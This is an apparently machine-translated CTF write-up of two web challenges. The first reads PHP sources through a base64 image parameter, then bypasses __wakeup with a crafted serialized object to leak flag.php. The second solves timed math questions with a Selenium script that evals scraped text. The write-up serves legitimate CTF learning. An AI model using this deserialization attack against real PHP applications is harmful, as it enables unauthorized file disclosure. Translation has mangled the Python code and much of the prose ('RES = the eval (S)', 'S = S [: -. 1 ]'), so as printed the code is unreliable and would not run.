Two CTF Web topics

1.easyphp

1.1. Title Description

The first is the subject of a picture that does not exist

View source found only one sentence

<img src="show.php?img=aGludC5qcGc=" width="100%"/>

Opening the source code of the image links to jump to the following page

Img content behind like base64-encoded, decoded verified as base64-encoded, after the reduction is hint.jpg.

Try to back img parameters flag.jpg, flag.php, after the flag instead of the base64-encoded visit, did not get to valuable content

Direct access to the index.php or show.php not see anything, so see if you can use this parameter to read img two php source

index.php base64 encoded as aW5kZXgucGhw

show.php is base64 encoded c2hvdy5waHA =

After attempts, then have to be read by the content source, the content are as follows

index.php

<?php 
  require_once('hint.php');
  $x = new hint();
  isset($_GET['class']) && $g = $_GET['class'];
  if (!empty($g)) {
    $x = unserialize($g);
    echo $x;
  }
?>
<img src="show.php?img=aGludC5qcGc=" width="100%"/>

show.php

<?php
  $f = $_GET['img'];
  if (!empty($f)) {
    $f = base64_decode($f);
    if (stripos($f,'..')===FALSE && stripos($f,'/')===FALSE && stripos($f,'\\')===FALSE
    && stripos($f,'flag')===FALSE) {
      readfile($f);
    } else {
      echo "File not found!";
    }
  }
?>

From index.php saw there is a source hint.php, read in the same manner, as follows

hint.php is base64 encoded aGludC5waHA =

<?php
  error_reporting(0);
    //flag is in flag.php
    class hint{ 
    public $file='';
    function __destruct(){ 
      if(!empty($this->file)) {
       if(strchr($this-> file,"\\")===false &&  strchr($this->file, '/')===false)
          show_source(dirname (__FILE__).'/'.$this ->file);
       else      die('Wrong filename.');
      }}  
    function __wakeup(){ $this-> file='index.php'; } 
    public function __toString(){return '' ;}} 
?>

1.2. Code audit

hint.php which tells us flag in flag.php in, so we have to try to read into this php file

show.php inside with stripos limits what we read, we can not be read by show.php way to flag.php

hint hint which defines a class that has a show_source (dirname (__FILE __) '/' $ this -> file..); method, we can read the file php

In the index.php which used unserialize () function is used to deserialize a hint object, we can try to use deserialized way to read flag.php

1.3.Payload construction

Copy hint.php locally, and then add the following lines of code, serialized string acquired by the web

$x=new hint();
$x->file="flag.php";
echo serialize($x);

O:4:"hint":1:{s:4:"file";s:8:"flag.php";}

Meaning serialized string can refer to: https://www.cnblogs.com/dogecheng/p/11652022.html

According to the source code of index.php, we put the string assigned to class just fine, but did not get flag

After that check online some information through deserializing after unserialize, also calls __wakeup () method, it will file to index.php, so reading is not flag.php

https://blog.csdn.net/bylfsj/article/details/101385852

We need to bypass __wakeup () function, but the bypass is simple. When serialized string, represents the number of object attribute value is greater than the actual number of properties , it knows to perform a wakeup method.

Our original serialized string:

O:4:"hint":1:{s:4:"file";s:8:"flag.php";}

We just need a change larger than its number to

O:4:"hint":2:{s:4:"file";s:8:"flag.php";}

This time to re-submit the request will be able to get the flag

 

2.calculate

2.1. Title Description

The following questions

10 requires us to answer the math. After testing, each question to be in within three seconds of correct answers, wrong answers, or the number of overtime clear answer to the right questions. And answer after an interval of 1 sec .

Page source code below, evaluate the expression in a div

<h1>calculate</h1>

<p>Answer the questions for 10 times and you can get flag.</p>
<p> You Have answered 0銆€questions;</p>

<form action="" method="post">
<div style="display:inline;color:#499E86">6</div><div style="display:inline;color:#BC2109">1</div><div style="display:inline;color:#E20AAD">5</div><div style="display:inline;color:#AE2893">+</div><div style="display:inline;color:#A3A7DA">9</div><div style="display:inline;color:#72311C">9</div><div style="display:inline;color:#7D99E9">7</div><div style="display:inline;color:#3DB475">+</div><div style="display:inline;color:#2144AE">6</div><div style="display:inline;color:#8523C0">1</div><div style="display:inline;color:#D42154">5</div><div style="display:inline;color:#DD166F">*</div><div style="display:inline;color:#0ADBF4">9</div><div style="display:inline;color:#116660">9</div><div style="display:inline;color:#4F6723">7</div><div style="display:inline;color:#7F7A0D">=</div>
<input type="text" name="ans">
<input type="submit" value="send!">
</form>

2.2. Scripting

Beginning with the requests python library to do, without success, to switch selenium do will be successful, the code is as follows:

from selenium import webdriver
from bs4 import BeautifulSoup
import time

driver=webdriver.Firefox()
driver.get("http://****:13002/")

def submit(driver):
    # 获取源码
    source = driver.page_source
    # BeautifulSoup解析
    soup = BeautifulSoup(source, "lxml")
    all_div = soup.find_all(name="div")

    # 获取表达式
    s = ""
    for I in all_div: 
        S = S + i.contents [0]
     # remove equals 
    S = S [: -. 1 ]
     Print (S) 

    # calculates 
    RES = the eval (S) 

    # provide answers 
    Element driver.find_element_by_name = ( " ANS " ) 
    element.send_keys (RES) 

    # wait 1.1 seconds     
    the time.sleep (1.1 ) 
    
    # submit answers 
    driver.find_element_by_xpath ( " / HTML / body / form / the INPUT [2] " ) .click ()
     Print ( " the Click ")

for i in range(10):
    submit(driver)

After answering 10 flag will appear on the page